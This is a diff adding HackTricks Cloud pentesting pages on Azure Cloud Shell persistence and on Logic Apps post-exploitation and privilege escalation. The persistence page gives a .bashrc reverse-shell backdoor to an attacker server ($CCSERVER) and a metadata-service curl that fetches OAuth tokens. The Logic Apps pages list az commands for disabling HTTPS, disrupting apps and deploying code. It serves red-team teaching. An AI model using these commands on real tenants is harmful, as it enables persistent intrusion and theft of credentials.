CloudShell & LogicApps

src/SUMMARY.md

@@ -409,6 +409,7 @@
     - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
     - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
     - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
+    - [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md)
     - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
     - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md)
     - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md)
@@ -452,6 +453,7 @@
     - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
     - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
     - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
+    - [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md)
     - [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
     - [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
     - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
@@ -471,6 +473,7 @@
       - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
     - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
     - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
+    - [Az - Logic Apps Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md)
     - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md)
     - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md)
     - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
@@ -480,6 +483,7 @@
     - [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md)
     - [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
   - [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
+    - [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md)
     - [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
     - [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
     - [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)

src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md

@@ -0,0 +1,56 @@
+# Az - Cloud Shell Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Shell Persistence
+
+Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:
+
+* **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
+* **Startup Scripts**: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
+
+Example backdoor in .bashrc:
+
+{% code overflow="wrap" %}
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
+```
+{% endcode %}
+
+This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.
+
+Additionally query Azure’s metadata service for instance details and tokens:
+{% code overflow="wrap" %}
+```bash
+curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
+```
+{% endcode %}
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}

src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md

@@ -0,0 +1,183 @@
+# Az - Logic Apps Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Logic Apps Database Post Exploitation
+For more information about logic apps check:
+
+{% content-ref url="../az-services/az-logic-apps.md" %}
+[az-logic-apps.md](../az-services/az-logic-apps.md)
+{% endcontent-ref %}
+
+### "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
+With these permissions, you can modify Logic App workflows and manage their identities. Specifically, you can assign or remove system-assigned and user-assigned managed identities to workflows, which allows the Logic App to authenticate and access other Azure resources without explicit credentials.
+
+{% code overflow="wrap" %}
+```bash
+az logic workflow identity remove/assign \
+  --name <workflow_name> \
+  --resource-group <resource_group_name> \
+  --system-assigned true \
+  --user-assigned "/subscriptions/<subscription_id>/resourceGroups/<resource_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<identity_name>"
+```
+{% endcode %}
+
+### "Microsoft.Web/sites/read", "Microsoft.Web/sites/write"
+With these permissions, you can create or update Logic Apps hosted on an App Service Plan. This includes modifying settings such as enabling or disabling HTTPS enforcement.
+
+{% code overflow="wrap" %}
+```bash
+az logicapp update \
+  --resource-group <resource_group_name> \
+  --name <logic_app_name> \
+  --set httpsOnly=false
+```
+{% endcode %}
+
+### "Microsoft.Web/sites/stop/action", "Microsoft.Web/sites/start/action" || "Microsoft.Web/sites/restart/action"
+With this permission, you can start/stop/restart a web app, including Logic Apps hosted on an App Service Plan. This action ensures that a previously stopped app is brought online and resumes its functionality. This can disrupt workflows, trigger unintended operations, or cause downtime by starting, stopping, or restarting Logic Apps unexpectedly.
+
+{% code overflow="wrap" %}
+```bash
+az webapp start/stop/restart \
+  --name <logic_app_name> \
+  --resource-group <resource_group_name>
+```
+{% endcode %}
+
+
+### "Microsoft.Web/sites/config/list/action", "Microsoft.Web/sites/read" && "Microsoft.Web/sites/config/write"
+
+With this permission, you can configure or modify settings for web apps, including Logic Apps hosted on an App Service Plan. This allows changes to app settings, connection strings, authentication configurations, and more.
+
+{% code overflow="wrap" %}
+```bash
+az logicapp config appsettings set \
+  --name <logic_app_name> \
+  --resource-group <resource_group_name> \
+  --settings "<key>=<value>"
+```
+{% endcode %}
+
+### "Microsoft.Logic/integrationAccounts/write"
+With this permission, you can create, update, or delete Azure Logic Apps integration accounts. This includes managing integration account-level configurations like maps, schemas, partners, agreements, and more.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account create \
+  --resource-group <resource_group_name> \
+  --name <integration_account_name> \
+  --location <location> \
+  --sku <Standard|Free> \
+  --state Enabled
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/batchConfigurations/write"
+
+With this permission, you can create or modify batch configurations within an Azure Logic Apps integration account. Batch configurations define how Logic Apps process and group incoming messages for batch processing.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account batch-configuration create \
+  --resource-group <resource_group_name> \
+  --integration-account-name <integration_account_name> \
+  --name <batch_configuration_name> \
+  --release-criteria '{
+      "messageCount": 100,
+      "batchSize": 1048576,
+  }'
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/maps/write"
+With this permission, you can create or modify maps within an Azure Logic Apps integration account. Maps are used to transform data from one format to another, enabling seamless integration between different systems and applications.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account map create \
+  --resource-group <resource_group_name> \
+  --integration-account-name <integration_account_name> \
+  --name <map_name> \
+  --map-type <Xslt|Xslt20|Xslt30> \
+  --content-type application/xml \
+  --map-content map-content.xslt
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/partners/write"
+With this permission, you can create or modify partners in an Azure Logic Apps integration account. Partners represent entities or systems that participate in business-to-business (B2B) workflows.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account partner create \
+  --resource-group <resource_group_name> \
+  --integration-account-name <integration_account_name> \
+  --name <partner_name> \
+  --partner-type <partner-type> \
+  --content '{
+    "b2b": {
+      "businessIdentities": [
+        {
+          "qualifier": "ZZ",
+          "value": "TradingPartner1"
+        }
+      ]
+    }
+  }'
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/sessions/write"
+With this permission, you can create or modify sessions within an Azure Logic Apps integration account. Sessions are used in B2B workflows to group messages and track related transactions over a defined period.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account session create \
+  --resource-group <resource_group_name> \
+  --integration-account-name <integration_account_name> \
+  --name <session_name> \
+  --content '{
+    "properties": {
+      "sessionId": "session123",
+      "data": {
+        "key1": "value1",
+        "key2": "value2"
+      }
+    }
+  }'
+```
+{% endcode %}
+
+### "*/delete"
+With this permissions you can delete resources related to Azure Logic Apps
+
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}

src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md

@@ -0,0 +1,79 @@
+# Az - Logic Apps Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Logic Apps Privesc
+For more information about SQL Database check:
+
+{% content-ref url="../az-services/az-logic-apps.md" %}
+[az-logic-apps.md](../az-services/az-logic-apps.md)
+{% endcontent-ref %}
+
+### ("Microsoft.Resources/subscriptions/resourcegroups/read", "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action") && ("Microsoft.Logic/workflows/triggers/run/action")
+
+With this permission, you can create or update, Azure Logic Apps workflows. Workflows define automated processes and integrations between various systems and services.
+
+{% code overflow="wrap" %}
+```bash
+az logic workflow create \
+  --resource-group <resource_group_name> \
+  --name <workflow_name> \
+  --definition <workflow_definition_file.json> \
+  --location <location>
+
+az logic workflow update \
+  --name my-new-workflow \
+  --resource-group logicappgroup \
+  --definition <workflow_definition_file.json>
+```
+{% endcode %}
+
+And after changing it, you can run it with:
+
+```bash
+az rest \
+  --method post \
+  --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/run?api-version=2016-10-01" \
+  --body '{}' \
+  --headers "Content-Type=application/json"
+```
+
+### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action")
+With these permissions, you can deploy, Logic App workflows using ZIP file deployments. These permissions enable actions such as reading app details, accessing publishing credentials, writing changes, and listing app configurations. Alongside the start permissions you can update and deploy a new Logic App with the content desired
+
+{% code overflow="wrap" %}
+```bash
+az logicapp deployment source config-zip \
+  --name <logic_app_name> \
+  --resource-group <resource_group_name> \
+  --src <path_to_zip_file>
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}